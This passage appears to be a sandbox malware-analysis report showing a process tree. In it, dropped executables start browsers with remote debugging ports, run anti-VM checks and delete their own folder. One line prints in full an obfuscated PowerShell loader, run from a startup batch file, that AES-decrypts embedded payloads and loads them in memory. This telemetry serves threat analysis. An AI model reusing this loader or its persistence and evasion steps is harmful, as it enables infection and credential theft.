                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff87d61cc40,0x7ff87d61cc4c,0x7ff87d61cc58
                              6⤵
                                PID:5624
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1812 /prefetch:2
                                6⤵
                                  PID:1636
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2004,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1880 /prefetch:3
                                  6⤵
                                    PID:3324
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2468 /prefetch:8
                                    6⤵
                                      PID:5780
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:620
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3380,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3392 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:2008
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:5216
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4496 /prefetch:8
                                      6⤵
                                        PID:5316
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:8
                                        6⤵
                                          PID:5376
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:8
                                          6⤵
                                            PID:6824
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4928,i,12741996787298660268,17317311546377093636,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8
                                            6⤵
                                              PID:6948
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                            5⤵
                                            • Uses browser remote debugging
                                            • Enumerates system info in registry
                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                            • Suspicious use of FindShellTrayWindow
                                            PID:6352
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff87d6246f8,0x7ff87d624708,0x7ff87d624718
                                              6⤵
                                              • Checks processor information in registry
                                              • Enumerates system info in registry
                                              PID:1648
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
                                              6⤵
                                                PID:808
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
                                                6⤵
                                                  PID:2668
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
                                                  6⤵
                                                    PID:4084
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                                    6⤵
                                                    • Uses browser remote debugging
                                                    PID:4468
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                                                    6⤵
                                                    • Uses browser remote debugging
                                                    PID:1164
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
                                                    6⤵
                                                    • Uses browser remote debugging
                                                    PID:812
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2108,3413827167237461882,3100887256034786349,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                                                    6⤵
                                                    • Uses browser remote debugging
                                                    PID:5072
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6fcjw" & exit
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3840
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 10
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Delays execution with timeout.exe
                                                    PID:5808
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 968
                                                4⤵
                                                • Program crash
                                                PID:1048
                                            • C:\Users\Admin\AppData\Local\Temp\1086784001\DTQCxXZ.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086784001\DTQCxXZ.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:5400
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086785041\tYliuwV.ps1"
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops startup file
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5480
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:6556
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6664
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  5⤵
                                                  • Blocklisted process makes network request
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6672
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                    6⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:7120
                                            • C:\Users\Admin\AppData\Local\Temp\1086786001\oVpNTUm.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086786001\oVpNTUm.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              PID:6528
                                            • C:\Users\Admin\AppData\Local\Temp\1086787001\qFqSpAp.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086787001\qFqSpAp.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:5488
                                            • C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              PID:5860
                                              • C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1086788001\Bjkm5hE.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:5992
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 968
                                                4⤵
                                                • Program crash
                                                PID:5336
                                            • C:\Users\Admin\AppData\Local\Temp\1086789001\C3hYpvm.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086789001\C3hYpvm.exe"
                                              3⤵
                                              • Drops startup file
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5228
                                            • C:\Users\Admin\AppData\Local\Temp\1086790001\f194fe0c36.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086790001\f194fe0c36.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              PID:2872
                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                4⤵
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                PID:4892
                                            • C:\Users\Admin\AppData\Local\Temp\1086791001\7741754b5d.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086791001\7741754b5d.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              PID:5852
                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                4⤵
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                PID:4568
                                            • C:\Users\Admin\AppData\Local\Temp\1086792001\2b2e2cbb7c.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086792001\2b2e2cbb7c.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:6972
                                            • C:\Users\Admin\AppData\Local\Temp\1086793001\6349744b39.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086793001\6349744b39.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5232
                                            • C:\Users\Admin\AppData\Local\Temp\1086794001\5567323d7a.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086794001\5567323d7a.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Checks processor information in registry
                                              PID:6872
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 1520
                                                4⤵
                                                • Program crash
                                                PID:7044
                                            • C:\Users\Admin\AppData\Local\Temp\1086795001\457170dfca.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086795001\457170dfca.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              PID:6648
                                            • C:\Users\Admin\AppData\Local\Temp\1086796001\4b2bea3bb2.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1086796001\4b2bea3bb2.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Downloads MZ/PE file
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Loads dropped DLL
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Checks processor information in registry
                                              PID:5000
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                4⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5924
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff87fbbcc40,0x7ff87fbbcc4c,0x7ff87fbbcc58
                                                  5⤵
                                                    PID:6280
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1944 /prefetch:2
                                                    5⤵
                                                      PID:5284
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2104 /prefetch:3
                                                      5⤵
                                                        PID:6148
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1596,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2452 /prefetch:8
                                                        5⤵
                                                          PID:5316
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:6544
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:3912
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4572,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3628 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:808
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
                                                          5⤵
                                                            PID:5060
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,17129218241726006661,16970695937275047412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8
                                                            5⤵
                                                              PID:5996
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            PID:2004
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8967d46f8,0x7ff8967d4708,0x7ff8967d4718
                                                              5⤵
                                                              • Checks processor information in registry
                                                              • Enumerates system info in registry
                                                              PID:3768
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                                                              5⤵
                                                                PID:6944
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                                                5⤵
                                                                  PID:2504
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
                                                                  5⤵
                                                                    PID:5128
